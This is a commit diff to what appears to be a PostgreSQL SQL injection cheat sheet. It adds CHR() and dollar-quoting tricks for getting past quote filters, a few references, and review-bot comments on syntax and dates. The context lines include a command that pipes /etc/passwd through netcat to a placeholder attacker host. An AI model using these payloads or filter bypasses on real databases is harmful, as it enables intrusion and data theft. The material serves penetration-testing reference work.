contribute PostgreSQL bypass quotes technique

hloverflow 2020-07-12 13:14:26 +08:00
parent 982ac3968c
commit baadc6d3e9


@ -203,6 +203,25 @@ CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
```
### Bypass Filter
#### Quotes
Using CHR
```sql
SELECT CHR(65)||CHR(66)||CHR(67);
```
Using Dollar-signs ( >= version 8 PostgreSQL)
```sql
SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$
```
## References
* [A Penetration Testers Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
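Review bot: the two dollar-quoted statements under "Using Dollar-signs" lack terminating semicolons, unlike the `SELECT CHR(65)||CHR(66)||CHR(67);` example above them, so pasting the block into psql as written produces one malformed statement rather than two; suggest `SELECT $$This is a string$$;` and `SELECT $TAG$This is another string$TAG$;`. The PostgreSQL documentation calls this feature "dollar quoting" (available since 8.0, so the version note is right), and using that name would make the reference easier to find. It would also help the reader to state what the CHR example evaluates to (`'ABC'`), since the point of the section is that the concatenated expression stands in for a quoted literal.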
@ -210,3 +229,4 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli)
* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - 2019 - INFIGO](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
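Review bot: the year in the new INFIGO reference reads "2019", but the linked filename is `INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf`, which suggests a 2009 publication date; please confirm the year before merging so the entry matches the date format used by the other references in the list.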